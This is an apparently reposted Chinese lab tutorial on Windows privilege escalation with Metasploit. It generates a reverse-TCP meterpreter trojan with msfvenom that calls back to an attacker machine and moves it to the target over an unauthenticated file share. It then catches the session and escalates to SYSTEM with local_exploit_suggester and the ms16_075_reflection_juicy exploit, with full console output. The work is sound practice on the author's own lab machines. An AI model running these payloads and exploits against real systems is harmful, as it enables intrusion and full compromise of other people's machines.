Windows溢出提权 [msf全自动提权练习]

admin 2024年10月13日18:17:42评论11 views字数 5940阅读19分48秒阅读模式

Windows溢出提权 [msf全自动提权练习]  

环境  

Windows2012目标机(靶机),kali攻击机,Windows10(作为一个中转的机器,重点是前两个)

Windows2012  

(由于该虚拟机无法安装vmtools,无法与真实机交互文件,所以我在本机win10上开启了一个共享文件,使他们可以交互文件方便后续操作。

正常的流程应该是2012上有一个web服务,通过getshell之后传递木马并运行上线msf)

Windows溢出提权 [msf全自动提权练习]

kali生成exe木马  

Windows msf.exe反弹木马,反弹地址为kali地址,反弹端口4444

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.54 LPORT=4444 -f exe -o msf.exe

然后把该木马拖到真实机的共享文件夹里

木马上传  

由于真实机与靶机无法交互,所以换一种思路,两台机器在同一网段下,真实机开启文件共享服务,利用文件共享服务把木马传至靶机。

选择一个文件夹,作为共享文件夹  

Windows溢出提权 [msf全自动提权练习]

右键属性-》共享-》选择everyone添加   

Windows溢出提权 [msf全自动提权练习]

Windows溢出提权 [msf全自动提权练习]

给予完全控制权限  

也是为了防止后续出现其他的问题

Windows溢出提权 [msf全自动提权练习]

回到共享栏-》选择网络和共享中心  

这里是为了关闭身份验证,不然他会需要账户密码

Windows溢出提权 [msf全自动提权练习]

Windows溢出提权 [msf全自动提权练习]

靶机访问-》拖木马  

路径长是因为我木马放在了共享文件夹的下一级目录里(问题不大),然后就可以拖出来了

Windows溢出提权 [msf全自动提权练习]

Windows溢出提权 [msf全自动提权练习]

kali监听  

输入 :msfconsole

选择监听模块 :use exploit/multi/handler

设置payload:set payload windows/meterpreter/reverse_tcp

(该payload,应该与生成木马时的payload一样)

查看还需要设置什么:options

设置一个lhost地址:set lhost 192.168.10.54

(监听地址,也是木马生成时的反弹地址(kali本机))

设置端口:与木马反弹的端口一致(这里我默认就是4444,所以不用改)

开启监听:run

靶机运行木马-》msf上线  

┌──(rootkali)-[/home/kali]

└─# msfconsole

______________________________________________________________________________

||

|3Kom SuperHack II Logon|

|______________________________________________________________________________|

||

||

||

|User Name:[security]|

||

|Password:[]|

||

||

||

|[ OK ]|

|______________________________________________________________________________|

||

|https://metasploit.com |

|______________________________________________________________________________|

=[metasploit v6.3.19-dev]

+ -- --=[ 2318 exploits - 1215 auxiliary - 412 post]

+ -- --=[ 1234 payloads - 46 encoders - 11 nops]

+ -- --=[ 9 evasion]

Metasploit tip: Enable verbose logging with set VERBOSE

true

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/met

set payload windows/meterpreter/bind_hidden_ipknock_tcp

set payload windows/meterpreter/bind_hidden_tcp

set payload windows/meterpreter/bind_ipv6_tcp

set payload windows/meterpreter/bind_ipv6_tcp_uuid

set payload windows/meterpreter/bind_named_pipe

set payload windows/meterpreter/bind_nonx_tcp

set payload windows/meterpreter/bind_tcp

set payload windows/meterpreter/bind_tcp_rc4

set payload windows/meterpreter/bind_tcp_uuid

set payload windows/meterpreter/reverse_hop_http

set payload windows/meterpreter/reverse_http

set payload windows/meterpreter/reverse_http_proxy_pstore

set payload windows/meterpreter/reverse_https

set payload windows/meterpreter/reverse_https_proxy

set payload windows/meterpreter/reverse_ipv6_tcp

set payload windows/meterpreter/reverse_named_pipe

set payload windows/meterpreter/reverse_nonx_tcp

set payload windows/meterpreter/reverse_ord_tcp

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp_allports

set payload windows/meterpreter/reverse_tcp_dns

set payload windows/meterpreter/reverse_tcp_rc4

set payload windows/meterpreter/reverse_tcp_rc4_dns

set payload windows/meterpreter/reverse_tcp_uuid

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

NameCurrentSettingRequiredDescription

--------------------------------------

Payload options (windows/meterpreter/reverse_tcp):

NameCurrentSettingRequiredDescription

--------------------------------------

EXITFUNCprocessyesExittechnique (Accepted

:'', seh, thread, proce

ss,none)

LHOSTyesThelisten address (an i

nterfacemay be specifie

d)

LPORT4444yesThelisten port

Exploit target:

IdName

------

0WildcardTarget

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost 192.168.10.54

lhost => 192.168.10.54

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.10.54:4444

[*] Sending stage (175686 bytes) to 192.168.10.62

[*] Meterpreter session 1 opened (192.168.10.54:4444 -> 192.168.10.62:49196) at 2023-07-21 09:28:52 +0800

这里应该是webshell连上之后传入木马程序,然后命令运行。但是2012靶机上没有web服务所以我这里就直接在靶机上点击运行了(这样的权限是administrator,不用管,我们的目的是为了提升到system权限)

Windows溢出提权 [msf全自动提权练习]

查看权限  

Windows溢出提权 [msf全自动提权练习]

保存该会话  

bg

Windows溢出提权 [msf全自动提权练习]

提权  

切换为提权模块  

use post/multi/recon/local_exploit_suggester

查看需要设置什么  

options

设置一个session  

set session 1

启动  

run

命令过程  

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester

msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

NameCurrentSettinRequiredDescription

g

-------------------------------------

SESSIONyesThesession to run t

hismodule on

SHOWDESCRIPTIfalseyesDisplaysa detailed

ONdescriptionfor the

availableexploits

View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set session 1

session => 1

msf6 post(multi/recon/local_exploit_suggester) > run

然后他会自动检测有哪些可利用的漏洞,执行结束列出  

yes代表可能存在该漏洞可利用,no代表没有

Windows溢出提权 [msf全自动提权练习]

执行提取  

选择一个模块:use exploit/windows/local/ms16_075_reflection_juicy

查看需要哪些设置:options

设置session:set session 1

启动:run

命令过程  

msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms16_075_reflection

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/local/ms16_075_reflection) > options

Module options (exploit/windows/local/ms16_075_reflection):

NameCurrentSettingRequiredDescription

--------------------------------------

SESSIONyesThesession to run this m

oduleon

Payload options (windows/meterpreter/reverse_tcp):

NameCurrentSettingRequiredDescription

--------------------------------------

EXITFUNCnoneyesExittechnique (Accepted

:'', seh, thread, proce

ss,none)

LHOST192.168.10.54yesThelisten address (an i

nterfacemay be specifie

d)

LPORT4444yesThelisten port

Exploit target:

IdName

------

0Automatic

View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms16_075_reflection) > set session 1

session => 1

msf6 exploit(windows/local/ms16_075_reflection) > run

[*] Started reverse TCP handler on 192.168.10.54:4444

[*] x64

[-] Exploit aborted due to failure: bad-config: Session/Target Arch mismatch; WOW64 not supported

[*] Exploit completed, but no session was created.

msf6 exploit(windows/local/ms16_075_reflection) > use exploit/windows/local/ms16_075_reflection_juicy

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1

session => 1

msf6 exploit(windows/local/ms16_075_reflection_juicy) > run

执行提权成功  

Windows溢出提权 [msf全自动提权练习]

原文始发于微信公众号(小白摸坑学网安):Windows溢出提权 [msf全自动提权练习]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日18:17:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows溢出提权 [msf全自动提权练习]https://cn-sec.com/archives/2493033.html

发表评论

匿名网友 填写信息